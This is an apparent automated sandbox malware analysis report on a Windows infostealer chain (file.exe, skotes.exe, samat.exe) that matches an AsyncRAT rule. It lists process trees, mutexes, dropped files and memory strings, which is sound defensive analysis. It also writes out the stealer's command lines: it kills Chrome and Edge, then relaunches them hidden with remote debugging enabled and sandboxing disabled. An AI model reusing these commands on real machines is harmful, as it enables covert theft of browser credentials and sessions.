Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12CACAD	8_2_00007FF7E12CACAD
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D1B50	8_2_00007FF7E12D1B50
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E3C10	8_2_00007FF7E12E3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D2C10	8_2_00007FF7E12D2C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E5C00	8_2_00007FF7E12E5C00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E5E7C	8_2_00007FF7E12E5E7C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D9EA0	8_2_00007FF7E12D9EA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12DDEF0	8_2_00007FF7E12DDEF0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D1D54	8_2_00007FF7E12D1D54
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D5D30	8_2_00007FF7E12D5D30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12DE570	8_2_00007FF7E12DE570
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D35A0	8_2_00007FF7E12D35A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E1874	8_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E08C8	8_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E40AC	8_2_00007FF7E12E40AC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D80E4	8_2_00007FF7E12D80E4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D1740	8_2_00007FF7E12D1740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E9728	8_2_00007FF7E12E9728
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D8794	8_2_00007FF7E12D8794
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D1F60	8_2_00007FF7E12D1F60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12C9800	8_2_00007FF7E12C9800
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB9710	8_2_00007FF8B7EB9710
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB94B0	8_2_00007FF8B7EB94B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EB5350	8_2_00007FF8B7EB5350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EE3A30	8_2_00007FF8B7EE3A30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7EE3300	8_2_00007FF8B7EE3300
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8064C70	8_2_00007FF8B8064C70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B805CF30	8_2_00007FF8B805CF30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8002250	8_2_00007FF8B8002250
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FF92B0	8_2_00007FF8B7FF92B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8047350	8_2_00007FF8B8047350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FF6930	8_2_00007FF8B7FF6930
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8042950	8_2_00007FF8B8042950
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B80099A0	8_2_00007FF8B80099A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FEFA10	8_2_00007FF8B7FEFA10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B804BB00	8_2_00007FF8B804BB00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8044B20	8_2_00007FF8B8044B20
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8036B40	8_2_00007FF8B8036B40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FE9B90	8_2_00007FF8B7FE9B90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8092BF0	8_2_00007FF8B8092BF0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FE3C10	8_2_00007FF8B7FE3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FFCC40	8_2_00007FF8B7FFCC40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B803CC40	8_2_00007FF8B803CC40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B801CC59	8_2_00007FF8B801CC59
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8078C80	8_2_00007FF8B8078C80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B806ACA0	8_2_00007FF8B806ACA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B803BCC0	8_2_00007FF8B803BCC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8030CE0	8_2_00007FF8B8030CE0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FF9D00	8_2_00007FF8B7FF9D00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FEBD30	8_2_00007FF8B7FEBD30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B800DDB0	8_2_00007FF8B800DDB0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FF0DC0	8_2_00007FF8B7FF0DC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8024E70	8_2_00007FF8B8024E70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B807CEA0	8_2_00007FF8B807CEA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8094FC0	8_2_00007FF8B8094FC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B806BFC0	8_2_00007FF8B806BFC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8008020	8_2_00007FF8B8008020
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8007040	8_2_00007FF8B8007040
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FE4120	8_2_00007FF8B7FE4120
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FF21E0	8_2_00007FF8B7FF21E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B80A42B0	8_2_00007FF8B80A42B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FFD2B0	8_2_00007FF8B7FFD2B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B802F2D0	8_2_00007FF8B802F2D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B800F2F0	8_2_00007FF8B800F2F0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FE32F5	8_2_00007FF8B7FE32F5
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B800D310	8_2_00007FF8B800D310
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B806A300	8_2_00007FF8B806A300
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FE7336	8_2_00007FF8B7FE7336
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FFC380	8_2_00007FF8B7FFC380
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B80543B0	8_2_00007FF8B80543B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B80854A0	8_2_00007FF8B80854A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FE94D0	8_2_00007FF8B7FE94D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B802A510	8_2_00007FF8B802A510
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FE4570	8_2_00007FF8B7FE4570
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B80045A0	8_2_00007FF8B80045A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B803B5B0	8_2_00007FF8B803B5B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B80115A0	8_2_00007FF8B80115A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B800E5C0	8_2_00007FF8B800E5C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FF3650	8_2_00007FF8B7FF3650
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B803E670	8_2_00007FF8B803E670
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B80406C0	8_2_00007FF8B80406C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8057750	8_2_00007FF8B8057750
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B80527E6	8_2_00007FF8B80527E6
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FE4820	8_2_00007FF8B7FE4820
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B804C840	8_2_00007FF8B804C840
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8025880	8_2_00007FF8B8025880
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FE288E	8_2_00007FF8B7FE288E
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B7FEA8C0	8_2_00007FF8B7FEA8C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8261FB0	8_2_00007FF8B8261FB0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B82623E0	8_2_00007FF8B82623E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8274810	8_2_00007FF8B8274810
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B82745C0	8_2_00007FF8B82745C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8281300	8_2_00007FF8B8281300
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8282270	8_2_00007FF8B8282270
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8281950	8_2_00007FF8B8281950
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8331596	8_2_00007FF8B8331596
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B837D980	8_2_00007FF8B837D980
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF8B8379A60	8_2_00007FF8B8379A60

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd 78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: String function: 00007FF7E12C2910 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: String function: 00007FF8B8011E20 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: String function: 00007FF8B83AD32F appears 41 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: String function: 00007FF7E12C2710 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: String function: 00007FF8B7E8C400 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: String function: 00007FF8B83AD341 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: String function: 00007FF8B7FE9340 appears 135 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: String function: 00007FF8B7FEA500 appears 163 times

Source: _overlapped.pyd.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: unknown

Driver loaded: C:\Windows\System32\drivers\mstee.sys

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP

Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9980096219346049
Source: file.exe	Static PE information: Section: fjmpujlc ZLIB complexity 0.9948450497623291
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9980096219346049
Source: skotes.exe.0.dr	Static PE information: Section: fjmpujlc ZLIB complexity 0.9948450497623291

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@147/209@43/19

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 8_2_00007FF8B7E8C400 GetLastError,FormatMessageW,_Py_NoneStruct,_Py_NoneStruct,PyUnicode_FromWideChar,PyUnicode_DecodeMBCS,Py_BuildValue,LocalFree,PyErr_SetObject,_Py_Dealloc,

8_2_00007FF8B7E8C400

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 8_2_00007FF8B7EBAC38 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CertOpenSystemStoreW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,_Py_NewReference,PyLong_FromVoidPtr,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,

8_2_00007FF8B7EBAC38

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\System32\dxdiag.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT item1, item2 FROM metadata;
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: samat.exe, samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT a11, a102 FROM nssPrivate WHERE a102 = ?;
Source: samat.exe, 00000008.00000003.3921967640.000001BCCD5EF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3921967640.000001BCCD5D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: file.exe

ReversingLabs: Detection: 47%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
